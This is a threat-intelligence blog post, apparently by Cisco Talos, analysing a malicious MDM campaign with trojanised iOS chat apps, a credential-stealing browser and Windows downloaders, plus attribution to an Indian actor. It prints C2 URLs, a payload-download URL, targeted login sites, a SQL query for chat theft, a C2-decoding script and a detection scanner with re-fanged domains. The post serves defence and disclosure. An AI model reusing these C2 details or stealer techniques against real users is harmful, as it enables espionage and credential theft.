_This blog post is authored by [Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>), [Paul Rascagneres](<https://twitter.com/r00tbsd>) and [Andrew Williams](<https://twitter.com/SmugYeti>)._
## Summary
Since our [initial post](<https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html>) on malicious mobile device management (MDM) platforms, we have gathered more information about this actor that we believe shows it is part of a broader campaign targeting multiple platforms. These new targets include Windows devices and additional backdoored iOS applications. We also believe we have associated this actor with a very similar campaign affecting Android devices.
With this additional information, we have been able to build a profile of how the MDM was working, as explained in the previous post, while also allowing us to identify new infrastructure. We feel that it is critical that users are aware of this attack method, as well-funded actors will continue to utilize MDMs to carry out their campaigns. To be infected by this kind of malware, a user needs to enroll their device, which means they should be on the lookout at all times to avoid accidental enrollment.
In the new MDM we discovered, the actor changed some of their infrastructure in an attempt to improve the MDM's security posture. We also found additional compromised devices, which were again located in India, with one even using the same phone number linking the MDM platforms, and one located in Qatar. We believe this newer version was used from January to March 2018. Similar to the previous MDM, we were able to identify the IPA files the attacker was using to compromise iOS devices. Additionally, we discovered that malicious apps such as WhatsApp had new malicious methods tacked onto them.
During this ongoing analysis, we also looked into other potential indicators that would point us toward the actor. We discovered this [Bellingcat article](<https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/>) that potentially links this actor to one they dubbed "Bahamut," an advanced actor who was previously targeting Android devices. Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post. There was also a separate post from [Amnesty International](<https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852>) discussing a similar actor that used similar spear-phishing techniques to Bahamut. However, Cisco Talos did not find any spear phishing associated with this campaign. We will discuss some links and potential overlapping with these campaigns below.
## New MDM
### Technical information about the MDM
Talos identified a third MDM server that we believe was used by this actor: ios-update-whatsapp[.]com.
The first relevant difference between this MDM and the MDM we discussed in the previous article is the fact that the attackers patched the open-source project [mdm-server](<https://github.com/project-imas/mdm-server>), a small iOS MDM server. The attackers added an authentication process; in the previous version, no authentication was available. Here is the auth page:
[Image: MDM authentication page](<https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s1600/image1.png>)
Additionally, we identified different technical information based on the certificate used. Here is the certificate used by this MDM:
```
CA.crt
    Serial Number: 17948952500637370160 (0xf9177d33a2d98730)
    Signature Algorithm: sha256WithRSAEncryption
    Issuer: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com
    Validity
        Not Before: Jan 15 09:47:15 2018 GMT
        Not After : Jan 15 09:47:15 2019 GMT
    Subject: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com
```
A fake company, Tech Big, which was allegedly located in Hong Kong, had this certificate issued to it in January 2018.
### Log analysis
Three devices were enrolled on this server:
* Two devices with an Indian phone number that were also located in India (one of the devices has the same phone number as the believed attacker's device used in the previous post)
* One device with a British phone number located in Qatar
The logs showed us that the MDM was created in January 2018, and was used from January to March of this year.
## New malicious iOS apps
### Fake Telegram & WhatsApp
Talos identified two other malicious Telegram and WhatsApp apps. The attacker built these apps by adding malicious capabilities to existing Telegram and WhatsApp applications. The malicious aspect of the apps is the same as what we described in the previous post. The only difference is the command and control (C2) obfuscation. The URLs are not stored in plaintext, but are encrypted with data encryption standard (DES) and encoded in base64.
Here is an example of the encoded URL:
[Image: encoded C2 URL](<https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s1600/image3.png>)
And the DES key:
[Image: DES key](<https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s1600/image4.png>)
Once decoded and decrypted, we can easily read the URL of the C2:
```
./decode.py vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ== '&%^*#@!$'
hxxp://hytechmart[.]com/UcSmCMbYECELdbe/
```
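Below is an added reconstruction of that decoding step (example code written for this article, not the decode.py from the post): it takes the base64 blob and the 8-byte key shown above, checks that the blob is made of whole DES blocks, and decrypts it with pycryptodome. The cipher mode (ECB) and PKCS#7 padding are assumptions, since the post does not state them, and pycryptodome is likewise an assumed dependency.

```python
import base64

try:
    from Crypto.Cipher import DES  # pycryptodome (assumed dependency, not named in the post)
except ImportError:  # the structural checks below still work without it
    DES = None

# Values taken from the post (the URL is defanged there as hxxp://hytechmart[.]com/...)
ENCODED_URL = "vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ=="
DES_KEY = b"&%^*#@!$"
EXPECTED_URL = "http://hytechmart.com/UcSmCMbYECELdbe/"
BLOCK = 8  # DES block size in bytes


def decode_blob(b64):
    """Base64 layer: return the raw ciphertext and check it is whole DES blocks."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) % BLOCK != 0:
        raise ValueError("ciphertext is not a multiple of the 8-byte DES block size")
    return raw


def strip_pkcs7(buf, block=BLOCK):
    """Remove PKCS#7 padding (assumed scheme); reject malformed padding."""
    pad = buf[-1]
    if not 1 <= pad <= block or buf[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding")
    return buf[:-pad]


def decrypt_c2(b64, key, mode="ECB", iv=b"\x00" * BLOCK):
    """Decode base64, then DES-decrypt. Mode is an assumption; try CBC with a zero IV if ECB
    yields garbage for a sample that uses the same obfuscation with a different key."""
    if len(key) != BLOCK:
        raise ValueError("DES keys are exactly 8 bytes")
    if DES is None:
        raise RuntimeError("pycryptodome is not installed")
    raw = decode_blob(b64)
    if mode == "ECB":
        cipher = DES.new(key, DES.MODE_ECB)
    else:
        cipher = DES.new(key, DES.MODE_CBC, iv=iv)
    return strip_pkcs7(cipher.decrypt(raw)).decode("utf-8")


if __name__ == "__main__":
    raw = decode_blob(ENCODED_URL)
    print(f"{len(raw)} bytes = {len(raw) // BLOCK} DES blocks, key length {len(DES_KEY)}")
    print(decrypt_c2(ENCODED_URL, DES_KEY))
```

The 38-character URL padded to 40 bytes is consistent with the five-block ciphertext, which is why PKCS#7 is the working assumption.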
### Fake IMO
IMO is a chat and video app available on mobile devices. We identified a fake application that pretended to be IMO. The attackers used the same technique to add malicious code to the legitimate application: the BOptions sideloading technique. For more information about this technique, we recommend reading the previous blog post.
The C2 server has the same obfuscation technique as the fake, malicious Telegram and WhatsApp apps described above. The attacker simply changed the encryption key used. The purpose of the malicious code is similar to the previous malicious apps in that it steals contact information and chat history. This application uses SQLite to store the data. Here is an example of a request performed to get the data:
* DBManager accesses `IMODb2.sqlite`
* `Select ZIMOCHATMSG.Z_PK,ZIMOCHATMSG.ZTEXT,ZIMOCHATMSG.ZISSENT,ZIMOCONTACT.ZPHONE,ZIMOCONTACT.ZBUID AS Contact_ID from ZIMOCONTACT join ZIMOCHATMSG ON (ZIMOCONTACT.ZBUID = ZIMOCHATMSG.ZBUID) where ZIMOCHATMSG.Z_PK >'%d'`
### Malicious Safari browser
Talos has also discovered a malicious Safari application available on the third malicious MDM. For this application, the attackers did not use the BOptions sideloading technique. It's a malicious browser developed from scratch and based on three open-source projects: [SCSafariPageController](<https://github.com/stefanceriu/SCSafariPageController>), [SCPageViewController](<https://github.com/stefanceriu/SCPageViewController>) and [SCScrollView](<https://github.com/stefanceriu/SCScrollView>).
The purpose of this browser is to steal sensitive information from the infected device. First, the app sends the universally unique identifier (UUID) of the device to the C2 server. Based on the server response, the malicious browser will send additional information, such as the user's contact information (picture, name, email, postal address, etc.), the user's pictures, the browser's cookies and the clipboard.
The malware checks for a file named "hib.txt," and if the file doesn't exist on the device, it displays an iTunes login page in an attempt to harvest the user's login credentials. Upon entering the credentials, the email address and password are sent to the C2 server. Additionally, these credentials get written into the file and the user is considered "signed in."
The most intriguing part is the credential stealer. If the browsed domain name contains one of the following strings, the malware will automatically exfiltrate the username and the password of the user to the C2 server. Most notably, there is the presence of secure email providers, among a variety of other web services.
* Login.yahoo (email platform)
* Mail.com (email platform)
* Rediff (Indian news portal and email platform with around 95 million registered users)
* Amazon (e-commerce platform)
* Pinterest (image-sharing and discovery platform)
* Reddit (news aggregation web portal with forums)
* Accounts.google (Google sign-in platform)
* Ask.fm (anonymous decentralised Q&A platform)
* Mail.qq (Chinese email platform)
* Baidu.com (Chinese search engine and email provider)
* Mail.protonmail (secure email provider located in Switzerland)
* Gmx (email platform)
* AonLine.aon (British assurance)
* ZoHo (Indian email service)
* Tutanota (secure email provider located in Germany)
* Lycos.com (search engine and web portal with email platform)
To steal credentials, the malware continuously monitors the web page, seeking out the HTML form fields that hold the username and password as the user types them in. The names of the inspected HTML fields are embedded into the app alongside the domain names. Here is a list of the "username" fields that are referenced by the app code:
[Image: username field names referenced by the app](<https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s1600/image5.png>)
For example, we see m_U, which is the username field in the Lycos mail authentication page:
[Image: Lycos mail login page with the m_U field](<https://3.bp.blogspot.com/-fkLqX32pCdU/W1bKf9CzIDI/AAAAAAAAAfw/T07PIxfpDU4rdQXSf1BZ3TJsiUIztbS8QCLcBGAs/s1600/image7.png>)
The malware contains a similar list concerning the password field.
Finally, the malicious browser contains three malicious plugins:
* "Add Bookmark"
* "Add To Favourites"
* "Add to Reading List"
The purpose of the malicious plugins is very similar to that of the other apps: they send stored data to the same C2 server.
In the core and the plugins, the C2 server is encoded in base64 and encrypted in AES instead of DES.
## Links with previous campaign
The Bahamut group was discovered and detailed by Bellingcat, an open-source news website. In that post, the author discussed Android-based malware with some similarities to the iOS malware we identified. That post kickstarted our investigation into any potential overlap between these campaigns and how they are potentially linked.
The new MDM platform we identified has similar victimology with Middle Eastern targets, namely Qatar, using a U.K. mobile number issued from LycaMobile. Bahamut targeted similar Qatar-based individuals during their campaign.
We identified an overlap in the domain voguextra[.]com, which was used by Bahamut within their "Devoted To Humanity" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post. Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal [here](<https://www.virustotal.com/%23/url/a65bcd077ea0c098ae0bc88414a38f2cf4333cae40d704eb88dfa043819f70d7/details>) using hxxp://voguextra[.]com/decoy.doc.
The domains used during this campaign shared similarities with the domains used throughout the Bahamut campaign reported by Bellingcat. Most of the email addresses used within the domains were [*@mail.ru](<mailto:*@mail.ru>) email accounts, the C2s identified both used AES encrypted strings represented as base64 values, and the URI patterns used in both campaigns shared an almost identical syntax:
```
repository + random.php + GET value
/hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string]
```
The domains also had similar structures for the domain name (they are formatted [word]-[word]-[word]) across both campaigns. Actors tend to stick with similar structures, especially if they have had success in the past.
Once we started profiling the domains, we quickly noticed a strong link to India. With access to historical whois and hosting information, we were able to determine that the three MDM domains pointed to an Indian nexus. All three domains used a privacy proxy to register their domains. However, what the actor did not do was create nameservers upon registering the domains. This allowed us to discover that two of the three domains were registered with Indian registrars and hosting providers.
The three domains identified for MDM use were ios-update-whatsapp[.]com, ios-certificate-update[.]com and www[.]wpitcher[.]com.
**ios-update-whatsapp[.]com**
The nameservers used initially were obox.dns[.]com, which is owned by Directi, an India-based registrar. These later changed to [ns1-2].ios-update-whatsapp[.]com, which suggests this domain was potentially registered and purchased in India.
**wpitcher[.]com**
This domain, one of the original MDM domains we identified, initially used nameservers related to MantraGrid, an India-based cloud platform, which is another link to an Indian actor.
**ios-certificate-update[.]com**
This domain used a similar structure to ios-update-whatsapp[.]com and also shared the same privacy proxy as the other two domains listed above relating to the MDM activity. This was one of the first registered domains and was using a bulletproof hosting platform in Panama.
Finally, Bellingcat, via Tom Lancaster, identified similarities with a previous InPage campaign reported by [Kaspersky](<https://securelist.com/inpage-zero-day-exploit-used-to-attack-financial-institutions-in-asia/76717/>), which shows similar URI structuring as well as victimology. The InPage attack targeted Urdu-speaking Muslims, which further increases the likelihood that the victims are Indian-based because Urdu is a dialect primarily spoken in India and Pakistan. With our attacker, we identified that the MDM was also taking advantage of an application called PrayTime, a popular app for Muslims that alerts them to complete their daily prayers.
With all of this taken into consideration, we assess with moderate confidence that the attacker is located in India. Additionally, we assess with low confidence that the campaign we discovered is linked to the Bahamut group.
## Links with Windows-targeted campaigns
Talos identified several malicious binaries that could be used to target victims running Microsoft Windows operating systems, using the same infrastructure as the malicious app mentioned in our previous article, techwach[.]com.
The sample 6b62f4db64edf7edd648c38a563f44b656b0f6ad9a0e4e97f93cf9abfdfc63e5 contacts the following URL to download an additional payload:
* hxxp://techwach[.]com/Beastwithtwobacks/Barkingupthewrongtree.php
We know that the MDM and the Windows services were up and running on the same C2 server in May 2018. The purpose of this malicious Windows binary is to collect information on the infected device (username and hostname), send this information, and retrieve an additional PE32 file if the operator judges that the targeted system is relevant.
We found additional similar samples between June 2017 and June 2018 with different C2 servers. The attackers have two kinds of samples: one developed in Delphi and one developed in VisualBasic.
Here are the Delphi samples:
* b96fc53f321729eda24af2a0b95e5c1d39d46acbd5a565e6c5f8c81f1bf9c7a1 -> hxxp://appswonder[.]info
* 3f463cebef1550b055ef6b4d1dad16ff1cb514f0091271ce92549e77bb5080d6 -> hxxp://referfile[.]com
* 4b94b152293e49532e549b2538cad85e950cd16ccd948a47a632376a840626ed -> hxxp://hiltrox[.]com
* e70a1c230ef2894363b834132bbdbb3a0edc88e81049a7c7774fa5b4ed78206b -> hxxp://scrollayer[.]com
* e7701f81141dfd6234488e51340ba2d05901c8242a6e9a9952c297c52a3ff050 -> hxxp://twitck[.]com
* e93f28efc1787ed5e8763cdc0417e7d5db1c9203e484350c64860fff91dab4f5 -> hxxp://scrollayer[.]com
Here are the VisualBasic samples:
* 6f362bc439ce09c7dcb0ac5cce84b81914b9dd1e9969cae8b570ade3af1cea3d -> hxxp://32player[.]com
* ce0026e0eb3f4f1d3d2a003400f863900f497745f3384e430926d99206cc5ed6 -> hxxp://nfinx[.]info
* d2c15c2043b0455cfad36f22f564b99ed46cea3891abb80eaf86093654c94dea -> hxxp://metclix[.]com/
* d7f90e9b1129e3223a886422b3625399d52913dcc2757734a67422ac905683f7 -> hxxp://appswonder[.]info/
* ec973e4319f5a9e8e9c28d315e7bb8153a620baa8ae52b455b68400612aad1d1 -> hxxp://capsnit[.]com/
Some of the C2 servers are still up and running at this time. The Apache setup is very specific, and perfectly matched the Apache setup of the malicious IPA apps.
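As an added detection example (written for this article, not Talos code), the following scans constructed proxy log lines for the "repository + random.php + GET value" URI syntax shown in the previous section and for the C2 domains named in this post (re-fanged here). The log format and the minimum path-segment length are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# C2 hosts named in the post, re-fanged (the post writes them as hytechmart[.]com etc.).
C2_DOMAINS = {
    "hytechmart.com", "techwach.com", "appswonder.info", "referfile.com",
    "hiltrox.com", "scrollayer.com", "twitck.com", "32player.com",
    "nfinx.info", "metclix.com", "capsnit.com",
}

# Query keys of the observed URI:
# /hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=[string]&v=N/A&s=[string]&t=[string]
EXPECTED_PARAMS = {"p", "g", "v", "s", "t"}

# "repository + random.php": one directory of random characters, then a random .php name.
# The minimum length of 8 is an assumption that keeps ordinary /blog/post.php paths out.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{8,}/[A-Za-z0-9]{8,}\.php$")


def matches_uri_pattern(url):
    """True when the URL has the random-dir/random.php path and exactly the p,g,v,s,t keys."""
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path):
        return False
    qs = parse_qs(parts.query, keep_blank_values=True)
    if set(qs) != EXPECTED_PARAMS:
        return False
    # Fixed values seen in the sample URI: p=1 and v=N/A
    return qs["p"] == ["1"] and qs["v"] == ["N/A"]


def matches_c2_domain(url):
    """True when the host is one of the post's C2 domains or a subdomain of one."""
    host = (urlsplit(url).hostname or "").lower()
    return host in C2_DOMAINS or any(host.endswith("." + d) for d in C2_DOMAINS)


# Constructed sample log, assumed format: "<timestamp> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
2018-05-10T12:00:01Z 10.0.0.5 GET http://example.org/index.html 200
2018-05-10T12:00:02Z 10.0.0.5 GET http://hytechmart.com/UcSmCMbYECELdbe/ 200
2018-05-10T12:00:03Z 10.0.0.7 GET http://cdn.example/hdhfdhffjvfjd/gfdhghfdjhvbdfhj.php?p=1&g=abc&v=N/A&s=def&t=ghi 200
2018-05-10T12:00:04Z 10.0.0.9 GET http://techwach.com/Beastwithtwobacks/Barkingupthewrongtree.php 200
2018-05-10T12:00:05Z 10.0.0.9 GET http://example.org/blog/post.php?p=1&id=5 200
"""


def scan_log(text):
    """Return (timestamp, client, url, reasons) for every line that matches a rule."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed lines rather than crash the scan
        ts, client, _method, url = fields[:4]
        reasons = []
        if matches_c2_domain(url):
            reasons.append("known-c2-domain")
        if matches_uri_pattern(url):
            reasons.append("uri-pattern")
        if reasons:
            hits.append((ts, client, url, reasons))
    return hits


if __name__ == "__main__":
    for ts, client, url, reasons in scan_log(SAMPLE_LOG):
        print(ts, client, ",".join(reasons), url)
```

The URI rule is the one worth keeping after the listed domains rotate, since the actor reused the same syntax across campaigns.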
Additionally, we identified the infection vector of one of the Windows malware samples. The attackers used a malicious RTF (a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4) abusing the CVE-2018-0802 vulnerability in order to drop and execute the last binary of the previously mentioned list.
Finally, one of the VisualBasic binaries was bundled in an MSI installer file along with the following decoy document:
[Image: decoy document](<https://3.bp.blogspot.com/-4HDJcicAXBE/W1bKn2yGiII/AAAAAAAAAf0/MbEcgjUj3s4k4SbkSrwEHuibuxyTUIokwCLcBGAs/s1600/image2.png>)
This decoy document is using a news story image found on the India Today newspaper website [here](<https://www.indiatoday.in/india/manipur/story/naga-peace-accord-nscn-im-muivah-greater-nagalim-967260-2017-03-23>), which is describing the Naga peace accord. The Indian targets in this campaign are likely very interested in this topic.
## Conclusion
Since researching our original blog post, we have discovered that an actor has been operating these malicious MDMs for many years. Based on previous research regarding the Bahamut group and our research, we believe the observed infrastructure is not limited to iOS targets, but is part of a broader framework that supports Apple iOS and Windows platforms.
This actor is likely located in India, given what we see in the technical elements. While the attacker's infrastructure throughout the entirety of the operation seems very similar to the one used by the Bahamut group, and they may even be connected, it is not possible to assert with high confidence that it is Bahamut at this time.
The use of a malicious MDM is convenient and the system is well-documented. Given the effectiveness of MDM abuse, it's likely that well-funded actors will continue to move into this area.
Because enrollment into the MDM requires user interaction and acceptance, it is crucial that they are aware of this type of threat and the dangers it can pose to their data and privacy.
Talos will continue to keep an eye on MDM and similar infrastructures to ensure we are reporting the latest information and forcing the bad guys to innovate.
## Coverage
Additional ways our customers can detect and block this threat are listed below.
[Image: coverage summary](<https://2.bp.blogspot.com/-MpTd6_oGMi0/W1bKtntBNlI/AAAAAAAAAf8/Ycr2D6n2AuQGMhf425rVk6SyT8-IkhxogCLcBGAs/s1600/image6.png>)
Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks.
[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign.
Network Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.
[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection for all Cisco Security products.
[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).
## IOCs
iOS Applications
* 422e4857614cc603f2388eb9a6b7bbe16d45b9fd0a9b752f02c107887cf8cb3e imo.ipa
* e3ceec8676e2a1779b8289e341874209a448b11f3d81834a2faae9c494267602 Safari.ipa
* bab7f61ed0f2b085c02ff1e4305ceab4479455d7b4cfba0a018b73ee955fcb51 Telegram.ipa
* fbfaed75aa855c7db486edee15359b9f8c1b394b0b02f77b22500a90c53cb423 WhatsApp.ipa
MDM Domain:
* ios-update-whatsapp[.]com
C2 Domains:
* hytechmart[.]com
Malicious RTF Samples:
* a1f2018bd61989a78247df53d808b6b513d530c47b89f2a919c59c848e2a6ac4

{"id": "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "type": "talosblog", "bulletinFamily": "blog", "title": "Advanced Mobile Malware Campaign in India uses Malicious MDM - Part 2", "description": "_This blog post is authored by[ ](<https://twitter.com/securitybeard?lang%3Den>)[Warren Mercer](<https://twitter.com/securitybeard?lang%3Den>) and[ ](<https://twitter.com/r00tbsd>)[Paul Rascagneres](<https://twitter.com/r00tbsd>) and[ ](<https://twitter.com/SmugYeti>)[Andrew Williams](<https://twitter.com/SmugYeti>)._ \n \n\n\n## Summary\n\n \nSince our [initial post](<https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html>) on malicious mobile device management (MDM) platforms, we have gathered more information about this actor that we believe shows it is part of a broader campaign targeting multiple platforms. These new targets include Windows devices and additional backdoored iOS applications. We also believe we have associated this actor with a very similar campaign affecting Android devices. \n \nWith this additional information, we have been able to build a profile of how the MDM was working, as explained in the previous post, while also allowing us to identify new infrastructure. We feel that it is critical that users are aware of this attack method, as well-funded actors will continue to utilize MDMs to carry out their campaigns. To be infected by this kind of malware, a user needs to enroll their device, which means they should be on the lookout at all times to avoid accidental enrollment. \n \nIn the new MDM we discovered, the actor changed some of their infrastructure in an attempt to improve the MDM's security posture. We also found additional compromised devices, which were again located in India, with one even using the same phone number linking the MDM platforms, and one located in Qatar. We believe this newer version was used from January to March 2018. 
Similar to the previous MDM, we were able to identify the IPA files the attacker was using to compromise iOS devices. Additionally, we discovered that malicious apps such as WhatsApp had new malicious methods tacked onto them. \n \nDuring this ongoing analysis, we also looked into other potential indicators that would point us toward the actor. We discovered this [Bellingcat article](<https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/>) that potentially links this actor to one they dubbed \"Bahamut,\" an advanced actor who was previously targeting Android devices. Bahamut shared a domain name with one of the malicious iOS applications mentioned in our previous post. There was also a separate post from [Amnesty International](<https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852>) discussing a similar actor that used similar spear-phishing techniques to Bahamut. However, Cisco Talos did not find any spear phishing associated with this campaign. We will discuss some links and potential overlapping with these campaigns below. \n \n \n \n\n\n## New MDM\n\n \n\n\n### Technical information about the MDM\n\n \nTalos identified a third MDM server that we believe was used by this actor: ios-update-whatsapp[.]com. \n \nThe first relevant difference between this MDM and the MDM we discussed in the previous article is the fact that the attackers patched the open-source project[ ](<https://github.com/project-imas/mdm-server>)[mdm-server](<https://github.com/project-imas/mdm-server>) \u2014 a small iOS MDM server. The attackers added an authentication process. In the last version, no authentication was available. 
Here is the auth page: \n\n\n[](<https://4.bp.blogspot.com/-uT9H_HJ3wXk/W1bKIgF7dnI/AAAAAAAAAfY/ymIstJCMcXEVxhV4kFW3P0kabJDMMDYDQCLcBGAs/s1600/image1.png>)\n\n \nAdditionally, we identified different technical information based on the certificate used. Here is the certificate used by this MDM: \n \nCA.crt \n\n \n \n Serial Number: 17948952500637370160 (0xf9177d33a2d98730) \n Signature Algorithm: sha256WithRSAEncryption \n Issuer: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n Validity \n Not Before: Jan 15 09:47:15 2018 GMT \n Not After : Jan 15 09:47:15 2019 GMT \n Subject: C=HK, ST=Kwun Tong, L=6/F 105 Wai Yip St 000000, O=TECHBIG, OU=IT, CN=TECHBIG.COM/emailAddress=info@techbig.com \n \n\nA fake company, Tech Big, which was allegedly located in Hong Kong, had this certificate issued to it in January 2018. \n\n\n### Log analysis\n\n \nThree devices were enrolled on this server: \n \n\n\n * Two devices with an Indian phone number that were also located in India (one of the devices has the same phone number as the believed attacker's device used in the previous post)\n * One device with a British phone number located in Qatar\n \nThe logs showed us that the MDM was created in January 2018, and was used from January to March of this year. \n \n\n\n## New malicious iOS apps\n\n \n\n\n### Fake Telegram & WhatsApp\n\n \nTalos identified two other malicious Telegram and WhatsApp apps. The attacker built these apps by adding malicious capabilities to existing Telegram and WhatsApp applications. The malicious aspect of the apps is the same as what we described in the previous post. The only difference is the command and control (C2) obfuscation. The URLs are not stored in plaintext, but are encrypted with data encryption standard (DES) and encoded in base64. 
\n \nHere is an example of the encoded URL: \n\n\n[](<https://3.bp.blogspot.com/-U-SgHhHsSg0/W1bKOlAYAJI/AAAAAAAAAfc/T6E32Sxt8soJebKun7fg17bKFcBQN0v8gCLcBGAs/s1600/image3.png>)\n\n \nAnd the DES key: \n\n\n[](<https://3.bp.blogspot.com/-LNu9YvVUt-k/W1bKUUFpw9I/AAAAAAAAAfg/hS5O3ODLvc4680_Ot9OpCQIOwwxDEwSlwCLcBGAs/s1600/image4.png>)\n\n \nOnce decoded and decrypted, we can easily read the URL of the C2: \n\n \n \n ./decode.py vZVI2iNWGCxO+FV6g46LZ8Sdg7YOLirR/BmfykogvcLhVPjqlJ4jsQ== '&%^*#@!$' \n hxxp://hytechmart[.]com/UcSmCMbYECELdbe/ \n \n\n### Fake IMO\n\n \nIMO is a chat and video app available on mobile devices. We identified a fake application that pretended to be IMO. The attackers used the same technique to add malicious code to the legitimate application: BOptions sideloading technique. For more information about this technique, we recommend reading the previous blog post. \n \nThe C2 server has the same obfuscation technique as the fake, malicious Telegram and WhatsApp apps described above. The attacker simply changed the encryption key used. The purpose of the malicious code is similar to the previous malicious apps in that it steals contact information and chat history. This application uses SQLite to store the data. Here is an example of request performed to get the data: \n \n\n\n * DBManager accesses 'IMODb2.sqlite'\n * Select ZIMOCHATMSG.Z_PK,ZIMOCHATMSG.ZTEXT,ZIMOCHATMSG.ZISSENT,ZIMOCONTACT.ZPHONE,ZIMOCONTACT.ZBUID AS Contact_ID from ZIMOCONTACT join ZIMOCHATMSG ON (ZIMOCONTACT.ZBUID = ZIMOCHATMSG.ZBUID) where ZIMOCHATMSG.Z_PK >'%d'\n\n### Malicious Safari browser\n\n \nTalos has also discovered a malicious Safari application available on the third malicious MDM. For this application, the attackers did not use the BOptions sideloading technique. 
It's a malicious browser developed from scratch and based on three open-source projects: [SCSafariPageController](<https://github.com/stefanceriu/SCSafariPageController>), [SCPageViewController ](<https://github.com/stefanceriu/SCPageViewController>)and [SCScrollView](<https://github.com/stefanceriu/SCScrollView>). \n \nThe purpose of this browser is to steal sensitive information from the infected device. First, the app sends the universally unique identifier (UUID) of the device to the C2 server. Based on the server response, the malicious browser will send additional information, such as the user's contact information (picture, name, email, postal address, etc.), the user's pictures, the browser's cookies and the clipboard. \n \nThe malware checks for a file named \"hib.txt,\" and if the file doesn't exist on the device, it displays an iTunes login page in an attempt to harvest the user's login credentials. Upon entering the credentials, the email address and password are sent to the C2 server. Additionally, these credentials get written into the file and the user is considered \"signed in.\" \n \nThe most intriguing part is the credential stealer. If the browsed domain name contains one of the following strings, the malware will automatically exfiltrate the username and the password of the user to the C2 server. Most notably, there is the presence of secure email providers, among a variety of other web services. 
\n \n\n\n * Login.yahoo (email platform)\n * Mail.com (email platform)\n * Rediff (Indian news portal and email platform with around 95 million registered users)\n * Amazon (e-commerce platform)\n * Pinterest (image-sharing and discovery platform)\n * Reddit (news aggregation web portal with forums)\n * Accounts.google (Google sign-in platform)\n * Ask.fm (anonymous decentralised Q&A platform)\n * Mail.qq (Chinese email platform)\n * Baidu.com (Chinese search engine and email provider)\n * Mail.protonmail (secure email provider located in Switzerland)\n * Gmx (email platform)\n * AonLine.aon (British assurance)\n * ZoHo (Indian email service)\n * Tutanota (secure email provider located in Germany)\n * Lycos.com (search engine and web portal with email platform)\n \nThe malware continuously monitors a web page, seeking out the HTML form fields that hold the username and password as the user types them in to steal credentials. The names of the inspected HTML fields are embedded into the app alongside the domain names. Here is a list of the \"username\" fields that are referenced by the app code: \n\n\n[](<https://1.bp.blogspot.com/-6oBe3W50V6E/W1bKau_WeNI/AAAAAAAAAfo/PVNYBh_5yJ4ffuBjt25FhAxfV22DaTXiACLcBGAs/s1600/image5.png>)\n\nFor example, we see m_U, which is the username field in the Lycos mail authentication page: 